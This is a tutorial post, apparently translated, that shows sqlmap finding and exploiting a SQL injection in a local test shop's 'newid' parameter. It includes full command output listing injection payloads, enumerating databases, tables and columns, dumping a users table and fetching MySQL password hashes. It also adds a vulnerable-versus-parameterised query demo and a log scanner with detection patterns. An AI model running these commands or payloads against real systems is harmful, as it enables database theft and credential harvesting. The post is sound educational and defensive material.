sqlmap

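sqlmap is an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers. It has a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches covering database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.

Installation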

pip install sqlmap

View the help

sqlmap -hh

Chinese documentation

https://sqlmap.campfire.ga/

Connecting directly to a database

Server-based database (MySQL)

DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME

sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users

File-based database (SQLite)

DBMS://DATABASE_FILEPATH

sqlmap -d "sqlite3://D:\apiTestDjango\db.sqlite3" -f --banner --dbs --tables

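Basic walkthrough

A local service is used here, purely to learn how to use sqlmap; please do not do anything illegal.

Source code of the scanned project: https://gitee.com/zy7y/uniapp_shop_server

1. Scan for injection points

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1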

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.5#pip}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:34:37 /2021-05-14/

[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:34:37 /2021-05-14/
# Title: Generic UNION query (NULL) - 5 columns is the injection point
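
Why `newid` is reported as injectable, and what removes the finding, shown as an added example that is not code from the original post or from the scanned project. It assumes the handler builds its query by string concatenation; the five-column `news` table, its row and the `qbbkq` marker are constructed stand-ins, run against in-memory SQLite rather than MySQL.

```python
import re
import sqlite3

# Payload shapes follow the sqlmap output above; the marker string is constructed.
BOOL_TRUE = "1 AND 6236=6236"
BOOL_FALSE = "1 AND 6236=6237"
UNION = "1 UNION ALL SELECT NULL,'qbbkq',NULL,NULL,NULL-- -"
COLS = "id, title, body, author, created"  # hypothetical 5-column news table

def make_db():
    """In-memory stand-in for the application's database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE news ({COLS})")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'first post', 'admin', '2021-05-14')")
    return db

def get_news_vulnerable(db, newid):
    # The request value becomes part of the SQL text, so it can change the query.
    return db.execute(f"SELECT {COLS} FROM news WHERE id = " + newid).fetchall()

def get_news_safe(db, newid):
    # Reject anything that is not a plain integer, then bind it as data.
    if not re.fullmatch(r"[0-9]{1,9}", newid):
        raise ValueError("newid must be an integer")
    return db.execute(f"SELECT {COLS} FROM news WHERE id = ?", (int(newid),)).fetchall()

def rejected(db, value):
    try:
        get_news_safe(db, value)
    except ValueError:
        return True
    return False

def demo():
    db = make_db()
    return {
        # True and false conditions give different responses: the boolean-blind signal.
        "bool_true_rows": len(get_news_vulnerable(db, BOOL_TRUE)),
        "bool_false_rows": len(get_news_vulnerable(db, BOOL_FALSE)),
        # The UNION payload adds a row that the table never contained.
        "union_marker_leaked": any("qbbkq" in row for row in get_news_vulnerable(db, UNION)),
        # The hardened handler serves the normal request and refuses all three payloads.
        "safe_normal_rows": len(get_news_safe(db, "1")),
        "safe_rejects": [rejected(db, p) for p in (BOOL_TRUE, BOOL_FALSE, UNION)],
    }

if __name__ == "__main__":
    print(demo())
```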

2. Enumerate all databases through the injection point (--dbs)

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#pip}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:12 /2021-05-14/

[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop

[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 13:40:12 /2021-05-14/

3. List all tables in a specified database

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.5#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:57:46 /2021-05-14/

[14:57:47] [INFO] resuming back-end DBMS 'mysql'
[14:57:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:57:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:57:47] [INFO] fetching tables for database: 'uniapp_shop'
Database: uniapp_shop
[36 tables]
+----------------------------+
| dt_article |
| dt_article_albums |
| dt_article_attach |
| dt_article_attribute_field |
| dt_article_attribute_value |
| dt_article_category |
| dt_article_comment |
| dt_brands |
| dt_channel |
| dt_channel_field |
| dt_channel_site |
| dt_express |
| dt_feedback |
| dt_link |
| dt_mail_template |
| dt_manager |
| dt_manager_log |
| dt_manager_role |
| dt_manager_role_value |
| dt_navigation |
| dt_order_goods |
| dt_orders |
| dt_payment |
| dt_sms_template |
| dt_user_amount_log |
| dt_user_attach_log |
| dt_user_code |
| dt_user_group_price |
| dt_user_groups |
| dt_user_login_log |
| dt_user_message |
| dt_user_oauth |
| dt_user_oauth_app |
| dt_user_point_log |
| dt_user_recharge |
| dt_users |
+----------------------------+

[14:57:47] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:57:47 /2021-05-14/

3. Enumerate the columns of a table (MySQL version > 5.0)

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D uniapp_shop -T dt_users --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.5.5#pip}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:59:01 /2021-05-14/

[14:59:01] [INFO] resuming back-end DBMS 'mysql'
[14:59:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[14:59:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:59:01] [INFO] fetching columns for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[22 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| exp | int |
| address | varchar(255) |
| amount | double |
| area | varchar(255) |
| avatar | varchar(255) |
| birthday | timestamp |
| email | varchar(50) |
| group_id | int |
| id | int |
| mobile | varchar(20) |
| msn | varchar(100) |
| nick_name | varchar(100) |
| password | varchar(100) |
| point | int |
| qq | varchar(20) |
| reg_ip | varchar(20) |
| reg_time | timestamp |
| salt | varchar(20) |
| sex | varchar(20) |
| status | int |
| telphone | varchar(50) |
| user_name | varchar(100) |
+-----------+--------------+

[14:59:02] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:59:02 /2021-05-14/

4. Retrieve table data by column name

Note: using --dump already breaks the law; please do not maliciously attack other people's services.

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --batch -D uniapp_shop -T dt_users -C user_name,id --dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.5.5#pip}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:03:52 /2021-05-14/

[15:03:52] [INFO] resuming back-end DBMS 'mysql'
[15:03:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=1 AND (SELECT 3711 FROM (SELECT(SLEEP(5)))aMmf)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=1 UNION ALL SELECT NULL,CONCAT(0x7162626b71,0x456a5258416472737a767a5a6d624b5448444b52745770566c4e67646c58666d474376737a6f476c,0x7170706271),NULL,NULL,NULL-- -
---
[15:03:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[15:03:52] [INFO] fetching entries of column(s) 'id,user_name' for table 'dt_users' in database 'uniapp_shop'
Database: uniapp_shop
Table: dt_users
[1 entry]
+-----------+----+
| user_name | id |
+-----------+----+
| test | 1 |
+-----------+----+

[15:03:53] [INFO] table 'uniapp_shop.dt_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\uniapp_shop\dt_users.csv'
[15:03:53] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 15:03:53 /2021-05-14/

5. Get the current database users and password hashes

Command: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords

(venv) D:\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.5#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:40:02 /2021-05-14/

[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)

Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3

[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'

[*] ending @ 14:40:05 /2021-05-14/
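
From the defender's side, the three payload types reported in the steps above can be spotted in web server access logs. The following is an added example, not part of the original post: the log lines are constructed in combined log format, and the patterns are heuristics modelled on the payloads shown in the output.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Heuristics modelled on the three payload types in the sqlmap output above.
RULES = [
    ("boolean-based blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I)),
]
# Combined log format: ip, identity, user, [time], "request", status, size, "referer", "agent".
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Constructed sample lines (not taken from the original post).
_FMT = '127.0.0.1 - - [14/May/2021:13:34:37 +0800] "GET /v1/getnews?newid={} HTTP/1.1" 200 512 "-" "{}"'
SAMPLE_LOG = [
    _FMT.format("1", "Mozilla/5.0"),
    _FMT.format("13%20AND%206236%3D6236", "sqlmap/1.5.5#pip (http://sqlmap.org)"),
    _FMT.format("13%20AND%20%28SELECT%208333%20FROM%20%28SELECT%28SLEEP%285%29%29%29cUBu%29", "Mozilla/5.0"),
    _FMT.format("13%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-", "Mozilla/5.0"),
]

def classify(line):
    """Return (client_ip, findings) for one log line, or None if it does not parse."""
    m = LINE.match(line)
    if m is None:
        return None
    ip, target, agent = m.groups()
    findings = []
    # The User-Agent is client-controlled, so treat it as a hint only.
    if agent.lower().startswith("sqlmap/"):
        findings.append("sqlmap user agent")
    # parse_qsl percent-decodes each value before the patterns are applied.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        findings += [f"{label} in '{name}'" for label, rx in RULES if rx.search(value)]
    return ip, findings

def scan(lines):
    """Keep only the parsed lines that triggered at least one rule."""
    results = [classify(line) for line in lines]
    return [r for r in results if r and r[1]]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```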

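Finally

Please do not use it maliciously to attack other people's services, and stay within the law. For advanced usage, see the official documentation.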
